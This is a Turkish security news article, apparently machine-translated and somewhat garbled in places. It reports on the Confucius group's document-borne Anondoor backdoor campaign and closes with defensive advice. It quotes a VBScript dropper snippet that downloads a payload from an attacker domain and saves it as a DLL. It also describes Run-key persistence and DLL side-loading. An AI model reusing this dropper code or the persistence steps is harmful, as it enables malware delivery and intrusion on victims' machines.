2013’ten beri aktif olan Konfüçyüs Hacker Group, yakın zamanda Windows uç noktalarını yeni bir Python tabanlı arka kapı ile tehlikeye atmak için kötü niyetli ofis belgelerini silahlandırarak operasyonlarını artırdı. Anonsor.
Tarihsel olarak Wooperstealer gibi belge stealer’ları dağıttığı bilinen tehdit oyuncusu, kalıcılık ve evade tespiti elde etmek için ole gömülü senaryolar, VBScript damlaları, PowerShell yükleyicileri ve planlanan görevleri kullanan sofistike çok aşamalı bir enfeksiyon zincirine geçti.
Bu evrim, grubun Tradecraft’ı geliştirme ve Güney Asya’daki hükümet ve savunma kuruluşlarında yüksek değerli bilgileri hedefleme taahhüdünün altını çiziyor.
.webp)
İlk erişim, en yaygın olarak, bozuk PPSX veya DOCX ataşmanları sağlayan mızrak aktı kampanyaları ile elde edilir.
Şüphesiz kullanıcılar bu belgeleri açtıklarında, gömülü bir ole nesnesini gizleyen bir “bozuk sayfa” istemiyle karşılaşırlar.
Bu nesne, uzak bir sunucudan ikincil bir belgenin arka plan getirilmesini tetikler.
Fortinet araştırmacıları, slayt1.xml.rels içindeki CMD saplamasının, bu kampanyada Anondoor’un ilk dağıtımını işaretleyerek Greenxeonsr.info’da barındırılan bir VBScript damlası başlattığını belirtti.
Yürütme üzerine, VBScript damlası aşağıdaki adımları gerçekleştirir: bir ham dll yükü indirmek için bir msxml2.xmlhttp nesnesi oluşturur, ikili %LocalAppData%\Mapistub.dllve sonra DLL yan yükleme yoluyla yürütme aşaması.
Droper ayrıca meşru bir yürütülebilir dosyayı da kopyalar. %AppData%\Swom.exe ve altında bir kayıt defteri anahtarı yazar HKCU\Software\Microsoft\Windows\CurrentVersion\Run Her girişte yan yüklü DLL’nin başlatılmasını sağlamak için.
.webp)
Bu strateji sadece güvenilir süreçler içinde kötü niyetli ikili olarak gizlemekle kalmaz, aynı zamanda göze çarpan eserler üretmeden sağlam kalıcılık sağlar.
Enfeksiyon mekanizması
Enfeksiyon mekanizması, anonoor’u sorunsuz bir şekilde tanıtmak için kötü niyetli bir ofis yükünden yararlanmaya odaklanır.
İlk olarak, belgenin OLE nesnesi Greenxeonsr.info’da barındırılan harici bir VBScript’e başvurur.
Aşağıdaki komut dosyası snippet’i, damlacının ADODB.stream’i nasıl kullandığını göstermektedir. İndirilen baytları bir DLL olarak kaydetmek için:-
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.Open "GET", "https://greenxeonsr.info/Jsdfwejhrg.rko", False
objXMLHTTP.Send
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1 ' Binary
objStream.Open
objStream.Write objXMLHTTP.responseBody
objStream.SaveToFile WScript.Network.UserName & "\Mapistub.dll", 2
objStream.CloseDLL yer aldıktan sonra, damlalık yeniden yapılandırılmış bir ShellExecute lansman için arayın Swom.exeDLL’yi belleğe yükleyen.
DLL daha sonra Wooperstealer modülü ve ek yapılandırma dosyaları da dahil olmak üzere daha fazla yükü almak için birden fazla C2 alanına (CornFieldBlue.info ve Hauntedfistree.info) ulaşır.
Bu çok katmanlı yaklaşım, bir aşama algılansa bile, sonraki yüklerin dinamik olarak getirilebilmesini, analiz edilmesini ve değiştirilmesini, adli araştırmaları karmaşıklaştırmasını sağlar.
Konfüçyüs, gizli komut dosyası ve DLL yan yükleme ile belgeye dayalı sömürüyü zincirleyerek, son nokta savunmalarına karşı gelişmiş operasyonel güvenlik ve esneklik gösterir.
Savunma ekipleri, anormal OLE nesnesi davranışı, beklenmedik kayıt defteri değişiklikleri ve ofis işlemleri içindeki olağandışı DLL yüklerini izlemeye öncelik vermelidir.
Atipik akışın kullanıcı dizinlerine yazdığı ve katı ağ segmentasyonunun uygulanmasını entegre etmek, ortaya çıkan bu tehdidi azaltmaya yardımcı olabilir.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
